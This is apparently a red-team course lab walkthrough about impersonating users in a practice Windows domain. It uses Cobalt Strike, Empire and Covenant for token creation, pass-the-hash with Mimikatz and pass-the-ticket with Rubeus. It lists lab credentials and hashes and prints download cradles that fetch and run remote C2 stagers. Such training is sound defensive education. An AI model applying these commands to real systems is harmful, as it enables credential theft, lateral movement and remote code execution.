Lab 4.3: User Impersonation
Objectives
- Learn to impersonate users through various methods
TTPs Emulated in this Lab
Preparation
Preparation Steps
If you have lost your Beacon/Agent on wk01.draconem.corp please deploy a new one.
As a reminder, the credentials we have compromised are:
- Username:
Gareth.Kilgallen - password:
Hu825meapvsAq#Rx
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp
Cobalt Strike can be accessed through guacamole http://10.130.2.22:8080/guacamole username: student password:Sec565!!
The Cobalt Strike Teamserver credentials are as follows
host: 10.130.4.100
password: sec565@!
The ports you can use with Cobalt Strike are 8888 for setting up a stager and 8443 for setting up a listener.
The easiest way to land a beacon in the lab is using the Scripted Web Delivery function in Cobalt Strike and then performing a download cradle under the form of
iex (irm -useb http://10.130.4.100:8888/a)
replace /a with whatever value you provided in the dialogue in Cobalt Strike.
If you need to copy paste commands, you can do so by opening the guacamole menu. On a Windows device, the Guacamole menu is displayed by pressing Ctrl + Alt + Shift. On a Mac, the Guacamole menu is displayed by pressing Ctrl ^ + Command ⌘ + Shift.
A new guacamole menu will appear in which you'll be able to paste your text. afterwards you'll be able to paste the text of the guacamole menu in your guacamole session, just like any normal paste.
On your own
- Create a token for
fs01\administratorand use it for lateral movement tofs01 - Pass-the-Hash (
0269838C577E626B859F9D863B0C6316) of the localadministratorand use it for lateral movement tofs01 - Pass-the-Ticket (
A5AA48FD29A3A1F5336703AB9A793115) ofGiulio.Stanionand use it for lateral movement tohr01
Walkthrough
Last lab, we identified that our user has access to the Sales share on fs01.draconem.corp.
If we take a look on the share, a script could be found called troubleshooting.ps1, this script contains the following code:
$password = ConvertTo-SecureString "sup3rs3cr3tP@ssw0rd!!" -AsPlainText -Force
$creds = new-object System.Management.Automation.PSCredential("FS01\Administrator", $password)
$session = New-CimSession -ComputerName fs01.draconem.corp -Credential $creds
Grant-SmbShareAccess -name "Sales" -AccountName "Draconem\Sales" -AccessRight Full -CimSession $session
Remove-CimSession -CimSession $session
It seems this script contains the plain-text password of a local admin account! We could potentially leverage these credentials to lateral move. In order to do that, we will first have to impersonate the user.
In this lab, we will take a look on how to do just that.
Make Token
The most straightforward way to do user impersonation is to create a new token.
In order to be able to execute this technique, the plain-text password must be known of the user you wish to impersonate.
We are in luck as we retrieved the plain-text credentials from the PowerShell script.
Cobalt Strike approach
4. In order to create a new access token we can utilize the built-in make_token task.
make_token fs01.draconem.corp\Administrator sup3rs3cr3tP@ssw0rd!!
note: Cobalt Strike will return a successfully impersonated message with your current user as name, instead of the new user. This is expected and is a quirk in Cobalt Strike.
5. Now that we created a new access token, let us try and access the C$ share of fs01.draconem.corp. This was not possible as our normal user, but should yield success with the local admin account.
ls \\fs01.draconem.corp\c$
6. Do not forget to issue the rev2self task to restore your regular privileges when you are done!
Empire approach
7. In order to create a new access token we can utilize the csharp/Sharpsploit.Credentials/MakeToken task:
- Domain:
FS01.draconem.corp - Password:
sup3rs3cr3tP@ssw0rd!! - Username:
Administrator
8. Now that we created a new access token, let us try and access the C$ share of fs01.draconem.corp. This was not possible as our normal user, but should yield success with the local admin account.
ls \\fs01.draconem.corp\c$
9. Do not forget to issue the csharp/Sharpsploit.Credentials/RevertToSelf task to restore your regular privileges when you are done!
BONUS: Covenant approach
10. In order to create a new access token we can utilize the MakeToken task:
maketoken Administrator fs01.draconem.corp sup3rs3cr3tP@ssw0rd!!
11. Now that we created a new access token, let us try and access the C$ share of fs01.draconem.corp. This was not possible as our normal user, but should yield success with the local admin account:
powershell ls \\fs01.draconem.corp\c$
12. Do not forget to issue the RevertToSelf task to restore your regular privileges when you are done!
Pass-the-Hash
What if we did not have the users password, but the NTLM hash 0269838C577E626B859F9D863B0C6316 instead?
If that was the case, we would have to Pass-the-Hash (or the ticket) instead! Unfortunately, we cannot do that without having local admin rights.
Perhaps the local admin account on wk01 has the same password as the one on fs01?
Cobalt Strike approach
13. If we want to pass-the-hash, we need a high privileged beacon. Let's try to spawn a new beacon as the local administrator account by using the local admin password we found for fs01.
spawnas allows you to spawn a new beacon provided you know the credentials.
NOTE: replace
spawnas administrator sup3rs3cr3tP@ssw0rd!! <LISTENER_NAME>
A new beacon should check in (in a high privilege context).
now for the sake of the lab, let's assume we did not have the password of fs01\administrator but the hash instead and that we got our current local admin agent another way.
14. Now that we have a high integrity beacon, let's attempt to pass-the-hash. let's use the built-in pth task.
In Cobalt Strike, the pth task will spawn a new process to generate the new access token and then impersonate it in the current Beacon.
Run this command in the new beacon running as Administrator
pth fs01\Administrator 0269838c577e626b859f9d863b0c6316
15. Finally, we can access the C$ share of fs01.draconem.corp !
ls \\fs01.draconem.corp\c$
Empire approach
16. Empire has a task called powershell/management/spawnas which is perfect for the job.
This will spawn a new agent with the provided credentials.
- In the domain field make sure to enter wk01 and NOT wk01.draconem.corp as we want local authentication.
- As Password we want to fill in sup3rs3cr3tP@ssw0rd!!
- As username we want Administrator
- As listener we want our listener that we have created previously.
After a few seconds you should get greeted with a new, high privileged, agent!
That was fun, now for the sake of the lab, let's assume we did not have the password of fs01\administrator but the hash instead and that we got our current local admin agent another way.
17. Now that we have a high integrity agent, let's attempt to pass-the-hash. In order for us to do this with Empire, let's use the built-in powershell/credentials/mimikatz/pth task.
As a reminder we want:
- The domain to be fs01.draconem.corp
- The ntlm hash to be 0269838c577e626b859f9d863b0c6316
- The user to be Administrator
18. In the output window, take close note of the PID of the cmd that was spawned as we need to steal that processes access token next.
This can be done with the powershell/credentials/tokens task.
Make sure that:
- ImpersonateUser is set to True.
- ProcessID has been replaced to the PID of the output of the mimikatz command you ran earlier.
19. Finally, we can access the C$ share of fs01.draconem.corp !
ls \\fs01.draconem.corp\c$
BONUS: Covenant approach
Ironically, Covenant crashes when trying to create a token with interactive credentials.
20. We will use the PowerShell runas script from Empire to launch a new Grunt, the script can be downloaded here: https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/management/Invoke-RunAs.ps1, it is also available in your slingshot VM under /home/sec565/tools.
Attention
Do not forget to issue the PowerShellImport task first to import the Invoke-RunAs script.
PowerShell Invoke-RunAs -username Administrator -password sup3rs3cr3tP@ssw0rd!! -cmd "cmd.exe" -Arguments "/k powershell -c iex(new-object net.webclient).downloadstring('<YOUR COVENANT STAGER URL>')"
After a few seconds a new, high privileged grunt will have checked in:
That was fun, now for the sake of the lab, let's assume we did not have the password of fs01\administrator but the hash instead and that we got our current local admin grunt another way. Now that we have a high integrity grunt, let's attempt to pass-the-hash. In order for us to do this with Covenant, let's use Mimikatz to pass-the-hash.
21. As already mentioned, the bundled Mimikatz version of Covenant is outdated, as a result it is better to use the Invoke-Mimikatz fork of BCSecurity, which can be downloaded here: https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1, it is also available in your Slingshot VM under the /home/sec565/tools folder.
Pay close attention to the quotes, the entire command is wrapped in single quotes and the commands themselves are wrapped by double quotes individually:
powershell Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::pth /domain:fs01.draconem.corp /user:Administrator /rc4:0269838C577E626B859F9D863B0C6316"'
In the output window, take close note of the PID of the cmd that was spawned as we need to steal that processes access token next. This can be done with the ImpersonateProcess task:
22. Finally, we can access the C$ share of fs01.draconem.corp !
powershell ls \\fs01.draconem.corp\c$
Pass-the-Ticket
Unfortunately, with a local account pass-the-ticket will not work. This is because local accounts do not deal with kerberos, as we have seen during the lecture. Let's for the sake of the lab, say that we have compromised another domain account.
UserName:Giulio.Stanion
NTLM:A5AA48FD29A3A1F5336703AB9A793115
Can you enumerate the access rights of this user? (preferably without BloodHound)
This user is local admin on hr01.draconem.corp
Cobalt Strike approach
Now that we compromised a domain user that is local admin on hr01.draconem.corp let us return to our unprivileged beacon (running as Gareth.Kilgallen).
23. As we want to make sure we are not interfering with the logon session of our compromised user, we need to create a sacrificial session.
make_token draconem.corp\dontknow dontcare
24. Now that we have the sacrificial session we can use Rubeus to create a tgt for Giulio.Stanion.
HOWEVER, we need to take something very important into account. Cobalt Strike's Execute-Assembly command will execute in an arbitrary process (which will not be using the token we just created). As a result importing the ticket would fail.
To bypass this problem, we will use inlineExecute-Assembly
We will need to load the inlineExecute-Assembly CNA script in our Cobalt Strike Client.
Please navigate to Cobalt Strike -> Script Manager in your Cobalt Strike Client.
Then press the Load button in the new tab that opened in the bottom half of the client.
Please navigate to C:\Tools\Inline-ExecuteAssembly\InlineExecuteAssembly and select the cna script then press Open.
You can now go back to your beacon tab and execute the following command:
inlineExecute-Assembly --dotnetassembly C:\Tools\Rubeus.exe --assemblyargs asktgt /domain:draconem.corp /user:Giulio.Stanion /rc4:A5AA48FD29A3A1F5336703AB9A793115 /ptt
25. And finally, we can now access the C$ share of hr01.draconem.corp.
ls \\hr01.draconem.corp\c$
Empire approach
Now that we compromised a domain user that is local admin on hr01.draconem.corp let us return to our unprivileged agent.
18. We can use the csharp/Sharpsploit.Credentials/MakeToken task to make a sacrificial session, as we want to make sure we are not interfering with the logon session of our compromised user.
- Domain: draconem.corp
- Password : dontknow
- Username : dontcare
19. Now that we have the sacrificial session we can use the powershell/credentials/rubeus task to create a tgt for Giulio.Stanion.
In the command field enter the following:
asktgt /domain:draconem.corp /user:Giulio.Stanion /rc4:A5AA48FD29A3A1F5336703AB9A793115 /ptt
20. And finally, we can now access the C$ share of hr01.draconem.corp.
ls \\hr01.draconem.corp\c$
21. Again, do not forget to revert to self (csharp/Sharpsploit.Credentials/RevertToSelf) after you are done to restore your normal access rights:
BONUS: Covenant approach
14. Now that we compromised a domain user that is local admin on hr01.draconem.corp let us return to our unprivileged Grunt.
We can use the MakeToken task to make a sacrificial session.
maketoken dontcare draconem.corp dontcare
15. Now that we have the sacrificial session we can use the Rubeus to create a tgt for Giulio.Stanion:
rubeus asktgt /domain:draconem.corp /user:Giulio.Stanion /rc4:A5AA48FD29A3A1F5336703AB9A793115 /ptt
16. And finally, we can now access the C$ share of hr01.draconem.corp.
ls \\hr01\c$ or ls \\hr01.draconem.corp\c$
17. Again, do not forget to revert to self after you are done to restore your normal access rights.
RevToSelf
If you've got some time left, feel free to try out the same scenario with the other C2 channel!































